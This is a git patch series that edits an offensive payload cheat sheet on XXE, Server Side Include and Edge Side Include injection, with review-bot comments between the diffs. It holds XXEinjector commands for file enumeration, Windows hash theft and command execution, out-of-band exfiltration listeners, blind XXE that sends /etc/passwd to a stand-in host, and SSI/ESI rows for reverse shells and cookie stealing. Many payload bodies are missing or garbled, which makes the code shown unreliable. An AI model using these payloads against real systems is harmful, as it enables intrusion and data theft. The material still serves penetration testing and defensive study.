From 846706b87dac4cbd74990d802f103f8fbb1c47ab Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 18 Nov 2024 10:43:39 +0100 Subject: [PATCH 1/4] XXE on JSON Endpoints --- XXE Injection/README.md | 176 +++++++++++++++++++--------------------- 1 file changed, 84 insertions(+), 92 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index c0d3ffee5d..05908f471e 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
@@ -6,34 +6,36 @@ ## Summary - [Tools](#tools) -- [Detect the vulnerability](#detect-the-vulnerability) -- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files) +- [Detect The Vulnerability](#detect-the-vulnerability) +- [Exploiting XXE to Retrieve Files](#exploiting-xxe-to-retrieve-files) - [Classic XXE](#classic-xxe) - - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded) - - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) - - [XInclude attacks](#xinclude-attacks) -- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) -- [Exploiting XXE to perform a denial of service](#exploiting-xxe-to-perform-a-denial-of-service) + - [Classic XXE Base64 Encoded](#classic-xxe-base64-encoded) + - [PHP Wrapper Inside XXE](#php-wrapper-inside-xxe) + - [XInclude Attacks](#xinclude-attacks) +- [Exploiting XXE to Perform SSRF Attacks](#exploiting-xxe-to-perform-SSRF-attacks) +- [Exploiting XXE to Perform a Denial of Service](#exploiting-xxe-to-perform-a-denial-of-service) - [Billion Laugh Attack](#billion-laugh-attack) - - [YAML attack](#yaml-attack) - - [Parameters Laugh attack](#parameters-laugh-attack) + - [YAML Attack](#yaml-attack) + - [Parameters Laugh Attack](#parameters-laugh-attack) - [Exploiting Error Based XXE](#exploiting-error-based-xxe) - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file) - [Error Based - Using Remote DTD](#error-based---using-remote-dtd) -- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) +- [Exploiting Blind XXE to Exfiltrate Data Out Of Band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter) + - [XXE OOB with DTD and PHP Filter](#xxe-oob-with-dtd-and-php-filter) - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf) +- [XXE with Local 
DTD](#xxe-with-local-dtd) - [WAF Bypasses](#waf-bypasses) - - [Bypass via character encoding](#bypass-via-character-encoding) + - [Bypass via Character Encoding](#bypass-via-character-encoding) + - [XXE on JSON Endpoints](#xxe-on-json-endpoints) - [XXE in Java](#xxe-in-java) -- [XXE in exotic files](#xxe-in-exotic-files) - - [XXE inside SVG](#xxe-inside-svg) - - [XXE inside SOAP](#xxe-inside-soap) - - [XXE inside DOCX file](#xxe-inside-docx-file) - - [XXE inside XLSX file](#xxe-inside-xlsx-file) - - [XXE inside DTD file](#xxe-inside-dtd-file) +- [XXE in Exotic Files](#xxe-in-exotic-files) + - [XXE Inside SVG](#xxe-inside-svg) + - [XXE Inside SOAP](#xxe-inside-soap) + - [XXE Inside DOCX file](#xxe-inside-docx-file) + - [XXE Inside XLSX file](#xxe-inside-xlsx-file) + - [XXE Inside DTD file](#xxe-inside-dtd-file) - [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents) - [Labs](#labs) - [References](#references) 
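Review bot: two anchors in the rewritten Summary still do not resolve to the headings they point at. `+- [Exploiting XXE to Perform SSRF Attacks](#exploiting-xxe-to-perform-SSRF-attacks)` keeps uppercase `SSRF` in the fragment, but GitHub lowercases heading anchors, so it should be `#exploiting-xxe-to-perform-ssrf-attacks`. The untouched context line `- [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)` misspells the name and keeps a triple dash; the heading `XXE OOB Attack (Yunusov, 2013)` renders as `#xxe-oob-attack-yunusov-2013`. Since this hunk already touches nearly every Summary line to re-case the titles, fix both fragments in the same pass.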
@@ -41,58 +43,14 @@ ## Tools -- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads - ```ps1 - sudo ./xxeftp -uno 443 - ./xxeftp -w -wps 5555 - ``` -- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) - ```ps1 - $ python3 230.py 2121 - ``` -- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods - ```ps1 - # Enumerating /etc directory in HTTPS application: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl - # Enumerating /etc directory using gopher for OOB method: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher - # Second order exploitation: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt - # Bruteforcing files using HTTP out of band method and netdoc protocol: - ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc - # Enumerating using direct exploitation: - ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK - # Enumerating unfiltered ports: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all - # Stealing Windows hashes: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes - # Uploading files using Java jar: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf - # Executing system commands using PHP expect: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls - # Testing for XSLT injection: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt - # Log requests only: - ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt - ``` -- 
[oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) - ```ps1 - ruby server.rb - ``` -- [docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc - ```ps1 - ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx - ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place - ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place - ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx - ``` -- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities. - ```ps1 - python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs - ``` - - -## Detect the vulnerability +- [staaldraad/xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads +- [lc/230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) +- [enjoiz/XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods +- [BuffaloWill/oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) +- [whitel1st/docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc + + 
+## Detect The Vulnerability **Internal Entity**: If an entity is declared within a DTD it is called an internal entity. Syntax: `` @@ -113,7 +71,7 @@ Basic entity test, when the XML parser parses the external entities the result s It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server. -## Exploiting XXE to retrieve files +## Exploiting XXE to Retrieve Files ### Classic XXE @@ -153,13 +111,13 @@ We try to display the content of the file `/etc/passwd`. ``` -### Classic XXE Base64 encoded +### Classic XXE Base64 Encoded ```xml %init; ]> ``` -### PHP Wrapper inside XXE +### PHP Wrapper Inside XXE ```xml ]> @@ -183,7 +141,7 @@ We try to display the content of the file `/etc/passwd`. &xxe; ``` -### XInclude attacks +### XInclude Attacks When you can't modify the **DOCTYPE** element use the **XInclude** to target @@ -194,7 +152,7 @@ When you can't modify the **DOCTYPE** element use the **XInclude** to target -## Exploiting XXE to perform SSRF attacks +## Exploiting XXE to Perform SSRF Attacks XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network. @@ -208,7 +166,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo ``` -## Exploiting XXE to perform a denial of service +## Exploiting XXE to Perform a Denial of Service :warning: : These attacks might kill the service or the server, do not use them on the production. @@ -225,7 +183,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo &a4; ``` -### YAML attack +### YAML Attack ```xml a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] 
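Review bot: the Tools hunk (`@@ -41,58 +43,14 @@`) removes every usage example (`sudo ./xxeftp -uno 443`, `python3 230.py 2121`, the whole XXEinjector command list, the oxml_xxe and docem invocations) and drops the otori entry outright, so the surviving one-line descriptions no longer tell the reader how to start any of the OOB servers. If the intent is a terse tool list, keep at least the single start-up command for each listener (`./xxeftp -w -wps 5555`, `python3 230.py 2121`), and either keep otori or state its removal in the commit message; a commit titled "XXE on JSON Endpoints" is not where anyone will look for a tool being dropped.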
@@ -239,7 +197,7 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` -### Parameters Laugh attack +### Parameters Laugh Attack A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping. @@ -334,7 +292,7 @@ Let's break down the payload: -## Exploiting blind XXE to exfiltrate data out-of-band +## Exploiting Blind XXE to Exfiltrate Data Out of Band Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack. @@ -376,7 +334,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd %all; ``` -### XXE OOB with DTD and PHP filter +### XXE OOB with DTD and PHP Filter ```xml @@ -415,7 +373,7 @@ Send the XML file to the `deploy` folder. Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) -## XXE with local DTD +## XXE with Local DTD In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this: ```xml @@ -451,26 +409,33 @@ Assuming payloads such as the previous return a verbose error. You can start poi ]> ``` + ### Cisco WebEx -``` + +```xml Your DTD code %local_dtd; ``` + ### Citrix XenMobile Server -``` + +```xml Your DTD code %local_dtd; ``` -[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) + +* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs. + ## WAF Bypasses -### Bypass via character encoding +### Bypass via Character Encoding XML parsers uses 4 methods to detect encoding: + * HTTP Content Type: `Content-Type: text/xml; charset=utf-8` * Reading Byte Order Mark (BOM) * Reading first symbols of document 
@@ -491,6 +456,31 @@ XML parsers uses 4 methods to detect encoding: cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ``` + +### XXE on JSON Endpoints + +In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**, + +| Content Type | Data | +| ------------------ | ---------------------------------- | +| `application/json` | `{"search":"name","value":"test"}` | +| `application/xml` | `namedata` | + + +* XML documents must contain one root (``) element that is the parent of all other elements. +* The data must be converted to XML too, otherwise the server will respond with an error. + +```json +{ + "errors":{ + "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity." + } +} +``` + +* [NetSPI/Content-Type Converter](https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4) + + ## XXE in Java Insecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE: @@ -512,9 +502,10 @@ Ref. - [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java) - [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/) -## XXE in exotic files -### XXE inside SVG +## XXE in Exotic Files + +### XXE Inside SVG ```xml @@ -565,7 +556,7 @@ _xxe.svg_ "> ``` -### XXE inside SOAP +### XXE Inside SOAP ```xml @@ -575,7 +566,7 @@ _xxe.svg_ ``` -### XXE inside DOCX file +### XXE Inside DOCX file Format of an Open XML file (inject the payload in any .xml file): @@ -600,11 +591,11 @@ JPG (experimental) GIF (experimental) ``` -### XXE inside XLSX file +### XXE Inside XLSX file Structure of the XLSX: -``` +```ps1 $ 7z l xxe.xlsx [...] Date Time Attr Size Compressed Name 
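Review bot: in the new "XXE on JSON Endpoints" section the lead sentence ends in a comma (`from **JSON** to **XML**,`) where a period is needed, and the section never draws the conclusion its own sample supports: the `org.xml.sax.SAXParseException` in the error body is the signal that the endpoint is now being parsed as XML (by a Java SAX stack), which is exactly what the reader is trying to establish before sending an entity payload. Add one sentence saying so after the JSON block. Also consider listing `text/xml` next to `application/xml` in the table so this section agrees with the earlier "It might help to set the `Content-Type: application/xml`" advice, and link the NetSPI Content-Type Converter to the extension's repository rather than the `releases/tag/1.4` URL, which will go stale.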
@@ -667,7 +658,7 @@ Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/ $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000 ``` -### XXE inside DTD file +### XXE Inside DTD file Most XXE payloads detailed above require control over both the DTD or `DOCTYPE` block as well as the `xml` file. In rare situations, you may only control the DTD file and won't be able to modify the `xml` file. For example, a MITM. @@ -752,6 +743,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 - [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) - [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - [Pentest XXE - @phonexicum - March 9, 2020](https://phonexicum.github.io/infosec/xxe.html) +- [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/) - [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe) - [XML attacks - Mariusz Banach (@mgeeky) - December 21, 2017](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) - [XML external entity (XXE) injection - PortSwigger - May 29, 2019](https://portswigger.net/web-security/xxe) From 98cfc9ce8c06c9f48d7d91e8f17167c3b4bb5ff7 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:41:35 +0100 Subject: [PATCH 2/4] XXE Error Based Local DTD --- XXE Injection/README.md | 181 ++++++++++++++-------------------------- 1 file changed, 61 insertions(+), 120 deletions(-) 
diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 05908f471e..c2f6094f7f 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -19,24 +19,23 @@ - [Parameters Laugh Attack](#parameters-laugh-attack) - [Exploiting Error Based XXE](#exploiting-error-based-xxe) - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file) + - [Linux Local DTD](#linux-local-dtd) + - [Windows Local DTD](#windows-local-dtd) - [Error Based - Using Remote DTD](#error-based---using-remote-dtd) - [Exploiting Blind XXE to Exfiltrate Data Out Of Band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - [XXE OOB with DTD and PHP Filter](#xxe-oob-with-dtd-and-php-filter) - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf) -- [XXE with Local DTD](#xxe-with-local-dtd) - [WAF Bypasses](#waf-bypasses) - [Bypass via Character Encoding](#bypass-via-character-encoding) - [XXE on JSON Endpoints](#xxe-on-json-endpoints) -- [XXE in Java](#xxe-in-java) - [XXE in Exotic Files](#xxe-in-exotic-files) - [XXE Inside SVG](#xxe-inside-svg) - [XXE Inside SOAP](#xxe-inside-soap) - [XXE Inside DOCX file](#xxe-inside-docx-file) - [XXE Inside XLSX file](#xxe-inside-xlsx-file) - [XXE Inside DTD file](#xxe-inside-dtd-file) -- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents) - [Labs](#labs) - [References](#references) 
@@ -217,7 +216,22 @@ A variant of the Billion Laughs attack, using delayed interpretation of paramete ### Error Based - Using Local DTD File -Short list of dtd files already stored on Linux systems; list them with `locate .dtd`: +If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename. + +```xml + + %local_dtd; +]> + +``` + +* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs. + + +#### Linux Local DTD + +Short list of DTD files already stored on Linux systems; list them with `locate .dtd`: ```xml /usr/share/xml/fontconfig/fonts.dtd @@ -245,6 +259,42 @@ The final payload becomes: Text ``` +#### Windows Local DTD + +Payloads from [infosec-au/xxe-windows.md](https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79). + +* Disclose local file + + ```xml + + + + "> + %eval; + %error; + + %local_dtd; + ]>anything + ``` + +* Disclose HTTP Response + + ```xml + + + + "> + %eval; + %error; + + %local_dtd; + ]>anything + ``` + ### Error Based - Using Remote DTD @@ -308,6 +358,12 @@ The easiest way to test for a blind XXE is to try to load a remote resource such ``` +```xml +]> +&test; +``` + + Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line. ```xml 
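Review bot: in `@@ -217,7 +216,22 @@` the sentence "Payload to confirm that error message include filename." is ungrammatical and hides the precondition it relies on: the payload only tells you anything if the parser echoes the entity's path back in the error text. Suggest "Use the following payload to confirm that the error message includes the file name; if the parser echoes the path of `%local_dtd`, local DTD tricks are viable." In the same hunk the "Linux Local DTD" list of paths (`/usr/share/xml/fontconfig/fonts.dtd`, ...) sits in a fence tagged `xml` although it is a plain path list; retag it as `ps1` like the other shell blocks in this file.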
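Review bot: in `@@ -308,6 +358,12 @@` the `&test;` payload is inserted directly after the existing remote-resource example with no prose, so it reads as a duplicate of the block above it. The section it was moved from (removed later in this patch) introduced it with "In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this:". Restore a one-line lead-in saying that this variant only needs the name to resolve, so it is the one to use when outbound HTTP is blocked but DNS is not.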
@@ -373,63 +429,6 @@ Send the XML file to the `deploy` folder. Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) -## XXE with Local DTD - -In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this: -```xml -]> -&test; -``` - -If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename. - -```xml - - - %local_dtd; -]> - -``` - -Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message. - -```xml - - - - "> - %eval; - %error; - '> - - %local_dtd; -]> - -``` - -### Cisco WebEx - -```xml - -Your DTD code -%local_dtd; -``` - -### Citrix XenMobile Server - -```xml - -Your DTD code -%local_dtd; -``` - -* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs. - - - ## WAF Bypasses ### Bypass via Character Encoding 
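Review bot: `@@ -373,63 +429,6 @@` removes the "XXE with Local DTD" section wholesale, but only its first two paragraphs and the dtd-finder bullet reappear in the new Error Based section earlier in this patch; the Cisco WebEx and Citrix XenMobile Server payloads ("Your DTD code %local_dtd;") are dropped from the file, and the References entry "Payloads for Cisco and Citrix - Arseniy Sharoglazov" is left behind with nothing pointing at it. Either carry the two vendor payloads into the error-based section as a short vendor subsection or state the deletion in the commit message.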
@@ -481,28 +480,6 @@ In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**, * [NetSPI/Content-Type Converter](https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4) -## XXE in Java - -Insecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE: - -![XXE Java security features overview infographics](https://semgrep.dev/docs/assets/images/cheat-sheets-xxe-java-infographics-1d1d5016802e3ab8f0886b62b8c81f21.png) - -- [DocumentBuilderFactory (javax.xml.parsers.DocumentBuilderFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3a-documentbuilderfactory) -- [SAXBuilder (org.jdom2.input.SAXBuilder)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3b-saxbuilder) -- [SAXParserFactory (javax.xml.parsers.SAXParserFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3c-saxparserfactory) -- [SAXParser (javax.xml.parsers.SAXParser )](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3d-saxparser) -- [SAXReader (org.dom4j.io.SAXReader)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3e-saxreader) -- [TransformerFactory (javax.xml.transform.TransformerFactory) & SAXTransformerFactory (javax.xml.transform.sax.SAXTransformerFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3f-transformerfactory--saxtransformerfactory) -- [SchemaFactory (javax.xml.validation.SchemaFactory)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3g-schemafactory) -- [Validator (javax.xml.validation.Validator)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3h-validator) -- [XMLReader (org.xml.sax.XMLReader)](https://semgrep.dev/docs/cheat-sheets/java-xxe/#3i-xmlreader) - -Ref. - -- [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java) -- [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/) - - ## XXE in Exotic Files ### XXE Inside SVG 
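Review bot: `@@ -481,28 +480,6 @@` deletes the entire "XXE in Java" section (the ten DOM/SAX/StAX classes and both Semgrep links) although the commit subject is "XXE Error Based Local DTD"; this is the only parser-side, defensive material on the page, and the file's References section is not updated to retain the Semgrep cheat sheet either. Split the removal into its own commit with a one-line rationale, or at minimum move "Semgrep - XML External entity prevention for Java" into References so the Java guidance stays reachable.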
@@ -652,7 +629,7 @@ And using FTP instead of HTTP allows to retrieve much larger files. "> ``` -Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/xxeserv): +Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv): ``` $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000 @@ -674,42 +651,6 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE ``` -## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents - -From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 - -### Disclose local file - -```xml - - - - "> - %eval; - %error; - - %local_dtd; - ]>cacat -``` - -### Disclose HTTP Response: - -```xml - - - - "> - %eval; - %error; - - %local_dtd; - ]>cacat -``` - ## Labs * [Root Me - XML External Entity](https://www.root-me.org/en/Challenges/Web-Server/XML-External-Entity) From 0108d015716669f6727dd4ec5d628113a2892cd8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 18 Nov 2024 16:51:28 +0100 Subject: [PATCH 3/4] Edge Side Inclusion --- .../Files/ssi_esi.txt | 92 +++++++++++++++++++ Server Side Include Injection/README.md | 55 +++++++++-- 2 files changed, 140 insertions(+), 7 deletions(-) create mode 100644 Server Side Include Injection/Files/ssi_esi.txt diff --git a/Server Side Include Injection/Files/ssi_esi.txt b/Server Side Include Injection/Files/ssi_esi.txt new file mode 100644 index 0000000000..bed4827e2e --- /dev/null +++ b/Server Side Include Injection/Files/ssi_esi.txt @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
 
+
+
+
+x=>alert(/Chrome%20XSS%20filter%20bypass/);> \ No newline at end of file diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md index 00c6bff593..6ec6cadea1 100644 --- a/Server Side Include Injection/README.md +++ b/Server Side Include Injection/README.md @@ -6,6 +6,7 @@ ## Summary * [Methodology](#methodology) +* [Edge Side Inclusion](#edge-side-inclusion) * [References](#references) 
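Review bot: the new `Server Side Include Injection/Files/ssi_esi.txt` ends with `\ No newline at end of file`, and none of the README hunks in this patch link to it, so a reader of the page cannot discover the 92-line payload file at all. Add the trailing newline and reference the file from the Edge Side Inclusion section (or beside the payload tables) with one line on how it is meant to be used.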
@@ -13,16 +14,56 @@ SSI Injection occurs when an attacker can input Server Side Include directives into a web application. SSIs are directives that can include files, execute commands, or print environment variables/attributes. If user input is not properly sanitized within an SSI context, this input can be used to manipulate server-side behavior and access sensitive information or execute commands. -| Description | Payload | -|-------------------------|---------| -| Print a date | `` | -| Print all the variables | `` | -| Include a file | `` | -| Execute commands | `` | -| Doing a reverse shell | `` | +SSI format: `` + +| Description | Payload | +| ----------------------- | ---------------------------------------- | +| Print the date | `` | +| Print the document name | `` | +| Print all the variables | `` | +| Setting variables | `` | +| Include a file | `` | +| Include a file | `` | +| Execute commands | `` | +| Reverse shell | `` | + + +## Edge Side Inclusion + +HTTP surrogates cannot differentiate between genuine ESI tags from the upstream server and malicious ones embedded in the HTTP response. This means that if an attacker manages to inject ESI tags into the HTTP response, the surrogate will process and evaluate them without question, assuming they are legitimate tags originating from the upstream server. + +Some surrogates will require ESI handling to be signaled in the Surrogate-Control HTTP header. 
+ +```ps1 +Surrogate-Control: content="ESI/1.0" +``` + +| Description | Payload | +| ----------------------- | ---------------------------------------- | +| Blind detection | `` | +| XSS | `` | +| Cookie stealer | `` | +| Include a file | `` | +| Display debug info | `` | +| Add header | `` | +| Inline fragment | `` | + + +| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist | +| -------- | -------- | ---- | ------- | ------------------------- | -------------- | +| Squid3 | Yes | Yes | Yes | Yes | No | +| Varnish Cache | Yes | No | No | Yes | Yes | +| Fastly | Yes | No | No | No | Yes | +| Akamai ESI Test Server (ETS) | Yes | Yes | Yes | No | No | +| NodeJS' esi | Yes | Yes | Yes | No | No | +| NodeJS' nodesi | Yes | No | No | No | Optional | ## References +* [Beyond XSS: Edge Side Include Injection - Louis Dion-Marcil - April 3, 2018](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) +* [DEF CON 26 - Edge Side Include Injection Abusing Caching Servers into SSRF - ldionmarcil - October 23, 2018](https://www.youtube.com/watch?v=VUZGZnpSg8I) +* [ESI Injection Part 2: Abusing specific implementations - Philippe Arteau - May 2, 2019](https://gosecure.ai/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/) * [Exploiting Server Side Include Injection - n00py - August 15, 2017](https://www.n00py.io/2017/08/exploiting-server-side-include-injection/) +* [Server Side Inclusion/Edge Side Inclusion Injection - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/server-side-inclusion-edge-side-inclusion-injection) * [Server-Side Includes (SSI) Injection - Weilin Zhong, Nsrav - December 4, 2019](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection) \ No newline at end of file From 4e03772f4a119dcb76bfa30b344203cf538e1431 Mon Sep 17 00:00:00 2001 
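Review bot: in `@@ -13,16 +14,56 @@` the SSI table has two rows with the identical description "Include a file" but different payloads; give each a description naming what differs between them, otherwise the reader cannot tell which one to pick. In the same hunk, the `Surrogate-Control: content="ESI/1.0"` example is an HTTP header but is fenced as `ps1`; use `http` or a plain fence. Two smaller points: the heading "Edge Side Inclusion" does not match the name used by every reference it cites ("Edge Side Include Injection"), so "Edge Side Include Injection" would be the more searchable heading; and the software matrix's "Upstream Headers Required" column is never tied back to the `Surrogate-Control` header mentioned above it, which one clause would fix.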
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 18 Nov 2024 18:26:58 +0100 Subject: [PATCH 4/4] API Key rework --- API Key Leaks/README.md | 171 +++++++++++----------------------------- 1 file changed, 47 insertions(+), 124 deletions(-) diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index c420581a4c..9bbd46c79f 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md 
